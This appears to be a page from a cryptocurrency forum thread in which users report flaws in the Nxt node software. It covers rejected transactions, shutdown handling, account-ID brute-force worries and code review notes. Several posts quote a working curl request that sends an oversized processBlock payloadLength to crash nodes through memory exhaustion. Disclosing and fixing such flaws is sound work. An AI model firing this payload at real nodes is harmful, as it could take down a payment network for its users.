Pages:
Author

Topic: Nxt source code flaw reports - page 35. (Read 113369 times)

legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 01:31:56 PM
Transaction is sent but rejected by peers coz it's too far in the future. Adjust ur time by minus 2 hours and check if u get any lost transaction.

What time do you mean? The server time, on which the nxt client is running?

Time of the machine NRS server part runs on.
newbie
Activity: 50
Merit: 0
January 07, 2014, 01:30:00 PM
Transaction is sent but rejected by peers coz it's too far in the future. Adjust ur time by minus 2 hours and check if u get any lost transaction.

What time do you mean? The server time, on which the nxt client is running?
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 01:27:32 PM
I'm using the nxt api for a small web project really often lately. I discovered that there is sometimes a problem whit sending money. The transaction gets sent, but does not show up in the nxt network. Only a reboot of the nxt client solves this problem.

When I normally use the api, it looks like the following. I sent the sendMoney api call, it takes 5-10 seconds and I get transaction bytes and id back. But sometimes the sendMoney api call gets sent and 1-2 seconds later I get the transaction bytes and id back. This transaction never shows up in the network though I get an id and the bytes back AND I am connected to peers that are online. I can in advance detect if a transaction will work just when I count the seconds between the api call and the return message.

I took a look at the code:

Code:
Transaction transaction = new Transaction(Transaction.TYPE_PAYMENT, Transaction.SUBTYPE_PAYMENT_ORDINARY_PAYMENT, getEpochTime(System.currentTimeMillis()), deadline, publicKey, recipient, amount, fee, referencedTransaction, new byte[64]);
transaction.sign(secretPhrase);

JSONObject peerRequest = new JSONObject();
peerRequest.put("requestType", "processTransactions");
JSONArray transactionsData = new JSONArray();
transactionsData.add(transaction.getJSONObject());
peerRequest.put("transactions", transactionsData);

Peer.sendToAllPeers(peerRequest);

response.put("transaction", convert(transaction.getId()));
response.put("bytes", convert(transaction.getBytes()));

Okay the transaction gets built, signed and the request gets created. This request is sent to all peers. In every case, so even when there is a problem with sending the transaction to peers, I get the id and bytes back. So my script thinks "No error, seems fine.".

The question is: Why do peers sometimes reject my transaction? Or is it a problem of the weight and the hole thing gets not sent out? It would be great if the call could check if the transaction does really show up in the network and otherwise return an error. The sentToAllPeers is currently void. Could we change that to boolean and return true if the transaction is sent at least to one peer? Then we could check at the api call if sendToAllPeers has done something and in the other case could put an proper error. Same in the webinterface: It is really annoying when it says "Money is sent.", but the transaction is lost. 

Transaction is sent but rejected by peers coz it's too far in the future. Adjust ur time by minus 2 hours and check if u get any lost transaction.
newbie
Activity: 50
Merit: 0
January 07, 2014, 12:35:06 PM
I'm using the nxt api for a small web project really often lately. I discovered that there is sometimes a problem whit sending money. The transaction gets sent, but does not show up in the nxt network. Only a reboot of the nxt client solves this problem.

When I normally use the api, it looks like the following. I sent the sendMoney api call, it takes 5-10 seconds and I get transaction bytes and id back. But sometimes the sendMoney api call gets sent and 1-2 seconds later I get the transaction bytes and id back. This transaction never shows up in the network though I get an id and the bytes back AND I am connected to peers that are online. I can in advance detect if a transaction will work just when I count the seconds between the api call and the return message.

I took a look at the code:

Code:
Transaction transaction = new Transaction(Transaction.TYPE_PAYMENT, Transaction.SUBTYPE_PAYMENT_ORDINARY_PAYMENT, getEpochTime(System.currentTimeMillis()), deadline, publicKey, recipient, amount, fee, referencedTransaction, new byte[64]);
transaction.sign(secretPhrase);

JSONObject peerRequest = new JSONObject();
peerRequest.put("requestType", "processTransactions");
JSONArray transactionsData = new JSONArray();
transactionsData.add(transaction.getJSONObject());
peerRequest.put("transactions", transactionsData);

Peer.sendToAllPeers(peerRequest);

response.put("transaction", convert(transaction.getId()));
response.put("bytes", convert(transaction.getBytes()));

Okay the transaction gets built, signed and the request gets created. This request is sent to all peers. In every case, so even when there is a problem with sending the transaction to peers, I get the id and bytes back. So my script thinks "No error, seems fine.".

The question is: Why do peers sometimes reject my transaction? Or is it a problem of the weight and the hole thing gets not sent out? It would be great if the call could check if the transaction does really show up in the network and otherwise return an error. The sentToAllPeers is currently void. Could we change that to boolean and return true if the transaction is sent at least to one peer? Then we could check at the api call if sendToAllPeers has done something and in the other case could put an proper error. Same in the webinterface: It is really annoying when it says "Money is sent.", but the transaction is lost. 
newbie
Activity: 11
Merit: 0
January 07, 2014, 11:22:59 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means, an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on this for this kind of operations. The solution is very easy here.. there is a check that should be done against the max payload constant and it is done, but too late in a different function. As soon as you call 'processBlock', a first allocation will occur.

If I trigger this constantly on a node (let say localhost), any concurrent 'new' operation will fail with an OOM exception before memory is exhausted by this issue. That means I can easily DoS any node I want without using that much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.

Nice catch... expect some tips!

I'm doing this to protect my investment... but thanks! That's always appreciated! Wink
full member
Activity: 168
Merit: 100
IDEX - LIVE Real-time DEX
January 07, 2014, 10:24:19 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means, an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on this for this kind of operations. The solution is very easy here.. there is a check that should be done against the max payload constant and it is done, but too late in a different function. As soon as you call 'processBlock', a first allocation will occur.

If I trigger this constantly on a node (let say localhost), any concurrent 'new' operation will fail with an OOM exception before memory is exhausted by this issue. That means I can easily DoS any node I want without using that much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.

Nice catch... expect some tips!
legendary
Activity: 868
Merit: 1000
Cryptotalk.org - Get paid for every post!
January 07, 2014, 10:07:55 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means, an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Wow!  Famous last words of a novice java programmer.
full member
Activity: 168
Merit: 100
IDEX - LIVE Real-time DEX
January 07, 2014, 09:59:06 AM
The fix is to call awaitTermination on the threadpools before call Block.saveBlocks.
This has been fixed since 0.4.9e. Waiting up to 10 s, then shutdownNow.


Guess that's not what is killing 80% of my nodes. heh.
What exactly do you see happening, blocks.nxt corrupted?

On restart, the node gets stuck on genesis block. I'll try some more with the new release.
legendary
Activity: 1181
Merit: 1002
January 07, 2014, 09:40:47 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.

actually a not very talented one could do it, request all peers, make list and issue requests... (even I might have a chance -> fix needed urgently  Wink)
hero member
Activity: 834
Merit: 524
Nxt NEM
January 07, 2014, 09:34:00 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.

Hopefully that (DDoS or other ...) is not happening now.
https://nextcoin.org/index.php/topic,2525.msg25258.html#msg25258
slowness and negative balances ...
hero member
Activity: 784
Merit: 501
January 07, 2014, 09:24:53 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.
newbie
Activity: 11
Merit: 0
January 07, 2014, 08:52:00 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means, an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on this for this kind of operations. The solution is very easy here.. there is a check that should be done against the max payload constant and it is done, but too late in a different function. As soon as you call 'processBlock', a first allocation will occur.

If I trigger this constantly on a node (let say localhost), any concurrent 'new' operation will fail with an OOM exception before memory is exhausted by this issue. That means I can easily DoS any node I want without using that much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:33:49 AM
Code:
All 256 bits r checked after the very 1st outgoing transaction is made.

They are not checked in unblock account.

It doesn't matter. An adversary still unable to spend the coins, the ledger is public anyway.


I guess I was wrong about the first 64-bits not being cryptographically secure, but we're still talking about 64 bits.

I still have not heard an answer as to why NXT isn't using (at least) 160-bit hashes like Bitcoin.

https://bitcointalksearch.org/topic/m.4352067
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:30:47 AM
There aren't any ASICs implementing Curve25519 yet Smiley. What if someone decides to implement one. Does that change your analysis?

They should hurry up, 11 months left.


Also, there's the potential for a rouge actor to claim all unopened NXT accounts by trying 2^64 secret phrases and preventing the network from creating any new accounts

It's impossible. He must spend at least 2^57 NXT for that.
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:28:05 AM
Code:
All 256 bits r checked after the very 1st outgoing transaction is made.

They are not checked in unblock account.

Quote
Note that SHA-224 is not a simple truncated version of SHA-256: the IV is different. SHA-224 is computed like SHA-256 and then truncated, but as the IV is different, the intermediate 256 bit result of SHA-224 is totally different (in general) than the SHA-256 computation. The same goes for SHA-384 vs SHA-512.
- http://crypto.stackexchange.com/questions/9435/is-truncating-a-sha512-hash-to-the-first-40-characters-as-secure-as-using-sha1

I guess I was wrong about the first 64-bits not being cryptographically secure, but we're still talking about 64 bits.

I still have not heard an answer as to why NXT isn't using (at least) 160-bit hashes like Bitcoin.
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:27:35 AM
You have to think like an attacker. They can do this by producing otherwise-valid blocks with high difficulties to knock out most of the network.

What do u mean?
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:25:12 AM
All 256 bits r checked after the very 1st outgoing transaction is made.
This is not a solution IMO. 2^64 is "only" 18446744073709551616 addresses. If not already possible, it isn't going to take many years for someone to gain the ability bruteforce and store keys to all of these addresses and automatically empty any "new" Nxt account whenever it's "made".

Unless ofc I'm missing something. Huh Do tell if I am.

Difficulty to hack any of such accounts ~ 271/numberOfAccounts of SHA256 operations.

Edit: U can't compare this to Bitcoin network coz there r no ASICs implementing Curve25519 yet.

There aren't any ASICs implementing Curve25519 yet Smiley. What if someone decides to implement one. Does that change your analysis?

Also, there's the potential for a rouge actor to claim all unopened NXT accounts by trying 2^64 secret phrases and preventing the network from creating any new accounts
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:13:00 AM
Code:
1. They'll be unblacklisted after a short period of time.

Right, but the fact that they get blacklisted for any amount of time would make the network more vulnerable for that period of time.

Code:
2. They can't do that without providing valid blocks or being blacklisted.

You have to think like an attacker. They can do this by producing otherwise-valid blocks with high difficulties to knock out most of the network.
sr. member
Activity: 392
Merit: 250
January 07, 2014, 06:44:21 AM
The fix is to call awaitTermination on the threadpools before call Block.saveBlocks.
This has been fixed since 0.4.9e. Waiting up to 10 s, then shutdownNow.


Guess that's not what is killing 80% of my nodes. heh.
What exactly do you see happening, blocks.nxt corrupted?
The code now is:
Code:
        scheduledThreadPool.shutdown();
        try {
            scheduledThreadPool.awaitTermination(10, TimeUnit.SECONDS);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        if (! scheduledThreadPool.isTerminated()) {
            logMessage("some threads didn't terminate, forcing shutdown");
            scheduledThreadPool.shutdownNow();
        }

        try {

            Block.saveBlocks("blocks.nxt", true);

        } catch (Exception e) {
            logMessage("error saving blocks.nxt");
        }

        try {

            Transaction.saveTransactions("transactions.nxt");

        } catch (Exception e) {
            logMessage("error saving transactions.nxt");
        }

        logMessage("Nxt stopped.");
If any thread didn't finish successfully, you will see the "some threads didn't terminate..." message. But even so, they are then terminated forcefully before trying to save blocks.nxt so shouldn't interfere.
I know, one could save to a temporary file and then rename. Don't want to get into unix vs windows file delete differences. Besides, the plan is to move away from saving serialized objects to a file eventually.
hero member
Activity: 834
Merit: 524
Nxt NEM
January 07, 2014, 06:06:22 AM
Some minor findings and questions about the sources - without any running or debuging.
They are on   "// " lines ...  possibly they don't have any effect to the program's execution ;-)

Code:
		
synchronized (Nxt.transactions) {
// if not breaking any logic, loop that contains removing, is better start from end
//     Not sure about Java and this code, but some programs may get critical problems, if removing causes kind of skipping over every second item.

for (int i = block.numberOfTransactions - 1; i >= 0 ; i--) {
//for (int i = 0; i < block.numberOfTransactions; i++) {

Transaction transaction = Nxt.transactions.remove(block.transactions[i]);
unconfirmedTransactions.put(block.transactions[i], transaction);

Account senderAccount = accounts.get(Account.getId(transaction.senderPublicKey));
// check if null?
synchronized (senderAccount) {

senderAccount.setBalance(senderAccount.balance + (transaction.amount + transaction.fee) * 100L);

}



----------------------------

----------------

block.blockSignature = Crypto.sign(data2, secretPhrase);

// inside if block: JSONObject request = block.getJSONObject(newTransactions);
//                  request.put("requestType", "processBlock");
// similarly could be eg. in "  case "sendMoney": ", etc.

if (block.verifyBlockSignature() && block.verifyGenerationSignature()) {
JSONObject request = block.getJSONObject(newTransactions);   // moved here
request.put("requestType", "processBlock");

Peer.sendToAllPeers(request);

} else {


--------------------

synchronized (Nxt.transactions) {

for (int i = 0; i < numberOfTransactions; i++) {

Transaction transaction = Nxt.transactions.get(transactions[i]);

long sender = Account.getId(transaction.senderPublicKey);
Account senderAccount = accounts.get(sender);
//  check if (senderAccount == null) {

synchronized (senderAccount) {


-------------------




long twofoldCurBaseTarget = curBaseTarget * 2;
if (twofoldCurBaseTarget < 0) {  
// also this?    twofoldCurBaseTarget > maxBaseTarget

twofoldCurBaseTarget = maxBaseTarget;

}

if (newBaseTarget > twofoldCurBaseTarget) {


------------------



byte[] getBytes() {

ByteBuffer buffer = ByteBuffer.allocate(4 + 4 + 8 + 4 + 4 + 4 + 4 + 32 + 32 + 64 + 64);
// Did Java take care about low memory or allocation errors? No need to check ?



------------




Account account = accounts.get(Account.getId(generatorPublicKey));
if (account == null || account.getEffectiveBalance() == 0) {

return false;

}
int elapsedTime = timestamp - previousBlock.timestamp;

// does target get here random numbers? Any test results of N*1000 run cases?
BigInteger target = BigInteger.valueOf(Block.getBaseTarget()).multiply(BigInteger.valueOf(account.getEffectiveBalance())).multiply(BigInteger.valueOf(elapsedTime));
byte[] generationSignatureHash = MessageDigest.getInstance("SHA-256").digest(generationSignature);

--------------------------



int getWeight() {
// ...

// if balance < 100, the result should be 0?  
return (int)(adjustedWeight * (account.balance / 100) / 1000000000);



-------------------------



for (i = 0; i < numberOfBlocks; i++) {
JSONObject blockData = (JSONObject)nextBlocks.get(i);
Block block = Block.getBlock(blockData);
// if block is null ?
curBlockId = block.getId();


----------------------------



synchronized (blocks) {

long blockId = lastBlock;
int height = Block.getLastBlock().height;
int numberOfBlocks = 0;
while (numberOfBlocks < 60) {  
// can height become negative in loop?

numberOfBlocks++;

Block block = blocks.get(blockId);



-----------------------------





Pages:
Jump to: